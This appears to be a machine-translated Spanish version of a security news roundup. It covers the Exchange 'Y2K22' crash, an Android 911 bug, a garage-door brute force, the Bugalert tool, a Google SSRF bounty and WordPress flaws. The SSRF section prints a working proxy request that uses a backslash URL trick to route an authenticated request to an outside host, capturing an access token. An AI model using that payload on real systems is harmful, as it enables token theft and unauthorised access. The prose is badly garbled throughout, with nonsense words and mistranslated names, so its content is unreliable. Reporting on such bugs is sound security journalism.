Si tuvo la desgracia de ejecutar un Microsoft Exchange Server la semana pasada, entonces no me requieren que le informe sobre el problema de Y2K22 . Para atrapar al resto de nosotros, cuando el intercambio intentó descargar la primera actualización de definiciones de malware de 2022, el número de versión de las nuevas definiciones activó un accidente en el motor de detección de malware. La fecha se representa como la cadena 2201010001, donde los dos primeros dígitos representan el año. Esta cadena se convierte en un entero largo firmado, que se al máxima en 2.147.483.647. Los desbordamientos enteros, así como el resultado, el comportamiento no definido, se bloquea el motor. El servidor deja de trabajar seguro, no procesar ningún tipo de mensajes sin un motor de malware de trabajo, lo que implica que ningún correo electrónico llega. ¡Año nuevo!
Android 911 denegación de servicio
Marcing 911 para servicios de emergencia es el peor momento para que un error de aplicación de software se manifieste. Google acaba de solucionar un error de este tipo en la actualización de Android de enero. Es una de esas extrañas interacciones involuntarias, en esta situación, los equipos de Microsoft activan el error de Android. Si la aplicación de Equipos está instalada, sin embargo, no ha iniciado sesión en la cuenta, los equipos producen, además de registrar un nuevo elemento de PhoneAccount en cada lanzamiento. Esto parece que debería ser raro, sin embargo, los equipos de Android también son notorios para desconectar espontáneamente al individuo. Cuando marca el 911, Android ejecuta una rutina para identificar cuál debe utilizarse PhoneAcpount para que se utilice para la llamada, así como resuelve lazos al comparar los hashes. Esa comparación es solo una resta ingenua, lo que implica que hay una posibilidad del 50% para obtener un resultado desfavorable. Esto fue imprevisto, lo que llevó al accidente.
Puerta de garaje Ingeniería inversa
Ingeniería inversa Un plan de autorización inalámbrico de 30 años puede no ser la hazaña de agarre de más interés, sin embargo, en algunos casos, el viaje es su propia recompensa. [Maxwell Dulin] nos trae la historia, así como este viaje definitivamente vale la pena. Los conceptos básicos de este hack es ciertamente viables, comenzando con echar un vistazo al hardware. La puerta del garaje se sincroniza con el abridor de la puerta del garaje al mantener un pulsador en el receptor mientras envía un código. Dentro del abridor, hay nueve interruptores DIP, cada uno con tres posiciones. ¿Qué hacen? Sacó su confiable SDR para obtener el tráfico web, además de intentar decodificar las señales. El inspectrum, así como la radio GNU, fueron los héroes aquí, lo que proporciona información sobre este esquema de autenticación fácil. ¿El pensamiento final en esta puerta de garaje real? Puede brudar forzar un código desconocido enviando todos los combo posibles, así como solo se necesitan 104 minutos.
Bugalert
Si usted es un SYSADMIN, entiende que algunos problemas llaman por teléfono para una acción instantánea. Si realizó servidores Java, la vulnerabilidad LOG4J fue una prueba de terminación de su protocolo de reacción. El tiempo entre la divulgación pública, así como siempre que lo escuchó, puede haber sido suficiente para desastrear el desastre. Si bien hay varios servicios de informes de errores, así como los marcos, nada bien se adapta a este nicho de utilización del caso: notificarlo lo antes posible de que su cabello pueda estar realmente en llamas. Ese nicho sin relleno bugged [Matthew Sullivan], quien ha revelado un nuevo proyecto, alerta de insectos. Todo es de código abierto, por lo que puede mantener su propia instancia si realmente desea. Puede optar por obtener un tweet, texto o incluso llamada telefónica. ¡Esto es posible que sea una herramienta útil, eche un vistazo!
Siento que soy un requisito de hacer que la alerta de insectos estableciera una canción extraña específica …
El zombie ssrf
[David Schütz] estaba buscando a Oscure Google API, así como encontró Jobs.Googleapis.com, que puedes demostrarte a ti mismo. Esa demo es interesante, ya que no es un servicio completamente carnado, sin embargo, habla con el genuino back-end. Las solicitudes van con un proxy, cxl-services.appspot.com, que maneja el paso de autenticación para la página de demostración. Si podría desencadenar una falsificación de solicitud del lado del servidor (SSRF), es posible que pueda obtener las solicitudes autenticadas, así como tal vez la técnica del proxy en el envío del tráfico web en su nombre. El análisis de la URL es difícil. ¿La técnica que funcionó? Una barra invertida en la URL. Obtenga /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ http / 1.1
Con un acceso a la ganancia a token en la mano, [David] comenzó a verificar bien otras API de Google para ver cómo este token le proporcionó acceder a. Proporciona la advertencia que hemos cubierto anteriormente, tenga cuidado con cuánto le presione. Es posible que haya informado el error mejor, sin embargo, deseó verificar que realmente tenía un acceso de ganancia en línea a token. Después de confirmar que el token ayudó a controlar el acceso, se convirtió en el hallazgo, así como en un punto de vista extremadamente bueno de $ 3133.70, además de $ 1000 adicionales por un gran informe, así como el aspecto cauteloso en el movimiento lateral. Eso es todo lo que hay, ¿verdad? No. Justo antes de que pase la fecha límite de divulgación de 90 días, [David] encontró un bypass de reparación. addiNG Cualquier tipo de texto entre la barra invertida, así como @ fue suficiente para romperlo. Uno más de $ 3133.70. Solo por diversión, probó las antiguas URL, que no deberían estar en servicio después de la solución. Sí, descubrió, sin embargo, una token de seguridad y seguridad más, así como en neto, $ 3133.70. Este ZOMBIE SSRF aún no está muerto, como lo demuestra en Twitter:
Actualización de WordPress
Si no ha configurado su instancia de WordPress para actualizar automáticamente, es hora de ir a inspeccionar la versión más reciente. Hay cuatro problemas potencialmente dañinos aquí, aunque los detalles son escasos en este punto. Muy FIRST UP es una vulnerabilidad de secuencias de comandos cruzadas en la publicación de babosas, la parte de la URL que coincide con el nombre de publicación. El segundo problema discutido es la inyección de elementos en algunas configuraciones multisólogas. Las dos últimas vulnerabilidades son las inyecciones de SQL, ciertamente merecen el “¿Qué año es?” meme